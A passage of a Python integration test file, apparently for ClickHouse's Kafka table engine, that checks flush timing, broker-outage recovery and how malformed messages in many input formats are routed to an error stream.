def test_premature_flush_on_eof(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'premature_flush_on_eof',
kafka_group_name = 'premature_flush_on_eof',
kafka_format = 'JSONEachRow';
SELECT * FROM test.kafka LIMIT 1;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# messages created here will be consumed immedeately after MV creation
# reaching topic EOF.
# But we should not do flush immedeately after reaching EOF, because
# next poll can return more data, and we should respect kafka_flush_interval_ms
# and try to form bigger block
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
instance.query('''
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# all subscriptions/assignments done during select, so it start sending data to test.destination
# immediately after creation of MV
instance.wait_for_log_line("Polled batch of 1 messages")
instance.wait_for_log_line("Stalled")
# produce more messages after delay
kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
# data was not flushed yet (it will be flushed 7.5 sec after creating MV)
assert int(instance.query("SELECT count() FROM test.destination")) == 0
instance.wait_for_log_line("Committed offset 2")
# it should be single part, i.e. single insert
result = instance.query('SELECT _part, count() FROM test.destination group by _part')
assert TSV(result) == TSV('all_1_1_0\t2')
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
def test_kafka_unavailable(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce(kafka_cluster, 'test_bad_reschedule', messages)
kafka_cluster.pause_container('kafka1')
instance.query('''
CREATE TABLE test.test_bad_reschedule (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_commit_on_select = 1,
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.destination_unavailable Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.test_bad_reschedule;
''')
instance.query("SELECT * FROM test.test_bad_reschedule")
instance.query("SELECT count() FROM test.destination_unavailable")
# enough to trigger issue
time.sleep(30)
kafka_cluster.unpause_container('kafka1')
while int(instance.query("SELECT count() FROM test.destination_unavailable")) < 20000:
print("Waiting for consume")
time.sleep(1)
def test_kafka_issue14202(kafka_cluster):
"""
INSERT INTO Kafka Engine from an empty SELECT sub query was leading to failure
"""
instance.query('''
CREATE TABLE test.empty_table (
dt Date,
some_string String
)
ENGINE = MergeTree()
PARTITION BY toYYYYMM(dt)
ORDER BY some_string;
CREATE TABLE test.kafka_q (t UInt64, `some_string` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue14202',
kafka_group_name = 'issue14202',
kafka_format = 'JSONEachRow';
''')
instance.query(
'INSERT INTO test.kafka_q SELECT t, some_string FROM ( SELECT dt AS t, some_string FROM test.empty_table )')
# check instance is alive
assert TSV(instance.query('SELECT 1')) == TSV('1')
instance.query('''
DROP TABLE test.empty_table;
DROP TABLE test.kafka_q;
''')
def test_kafka_csv_with_thread_per_consumer(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv_with_thread_per_consumer',
kafka_group_name = 'csv_with_thread_per_consumer',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
kafka_num_consumers = 4,
kafka_commit_on_select = 1,
kafka_thread_per_consumer = 1;
''')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, 'csv_with_thread_per_consumer', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def random_string(size=8):
return ''.join(random.choices(string.ascii_uppercase + string.digits, k=size))
def test_kafka_engine_put_errors_to_stream(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream',
kafka_group_name = 'kafka_engine_put_errors_to_stream',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 128,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')
messages = []
for i in range(128):
if i % 2 == 0:
messages.append(json.dumps({'i': i, 's': random_string(8)}))
else:
# Unexpected json content for table test.kafka.
messages.append(json.dumps({'i': 'n_' + random_string(4), 's': random_string(8)}))
kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream', messages)
instance.wait_for_log_line("Committed offset 128")
assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('64')
assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
def gen_normal_json():
return '{"i":1000, "s":"ABC123abc"}'
def gen_malformed_json():
return '{"i":"n1000", "s":"1000"}'
def gen_message_with_jsons(jsons = 10, malformed = 0):
s = io.StringIO()
# we don't care on which position error will be added
# (we skip whole broken message), but we need to be
# sure that at least one error will be added,
# otherwise test will fail.
error_pos = random.randint(0,jsons-1)
for i in range (jsons):
if malformed and i == error_pos:
s.write(gen_malformed_json())
else:
s.write(gen_normal_json())
s.write(' ')
return s.getvalue()
def test_kafka_engine_put_errors_to_stream_with_random_malformed_json(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_group_name = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')
messages = []
for i in range(128):
if i % 2 == 0:
messages.append(gen_message_with_jsons(10, 1))
else:
messages.append(gen_message_with_jsons(10, 0))
kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream_with_random_malformed_json', messages)
instance.wait_for_log_line("Committed offset 128")
# 64 good messages, each containing 10 rows
assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('640')
# 64 bad messages, each containing some broken row
assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
def test_kafka_formats_with_broken_message(kafka_cluster):
# data was dumped from clickhouse itself in a following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
# broken message
'{"id":"0","blockNo":"BAD","val1":"AM","val2":0.5,"val3":1}',
],
'expected':'''{"raw_message":"{\\"id\\":\\"0\\",\\"blockNo\\":\\"BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable': True,
},
# JSONAsString doesn't fit to that test, and tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse input: expected '\\"' before: 'BAD\\", \\"AM\\", 0.5, 1]': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable':True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse JSON string: expected opening quote"}''',
'printable':True,
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# broken message
'id=0\tblockNo=BAD\tval1=AM\tval2=0.5\tval3=1\n',
],
'expected':'{"raw_message":"id=0\\tblockNo=BAD\\tval1=AM\\tval2=0.5\\tval3=1\\n","error":"Found garbage after field in TSKV format: blockNo: (at row 1)\\n"}',
'printable':True,
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
# broken message
'0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
# broken message
'0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# broken message
'"id","blockNo","val1","val2","val3"\n0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"\\"id\\",\\"blockNo\\",\\"val1\\",\\"val2\\",\\"val3\\"\\n0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
# broken message
"(0,'BAD','AM',0.5,1)",
],
'expected':r'''{"raw_message":"(0,'BAD','AM',0.5,1)","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\nInt64\\tUInt16\\tString\\tFloat32\\tUInt8\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# broken message
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x53\x74\x72\x69\x6e\x67\x03\x42\x41\x44\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
],
'expected':'''{"raw_message":"050102696405496E743634000000000000000007626C6F636B4E6F06537472696E67034241440476616C3106537472696E6702414D0476616C3207466C6F617433320000003F0476616C330555496E743801","error":"Cannot convert: String to UInt16"}''',
'printable':False,
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"00000000000000000342414402414D0000003F01","error":"Cannot read all data. Bytes read: 9. Bytes expected: 65.: (at row 1)\\n"}',
'printable':False,
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00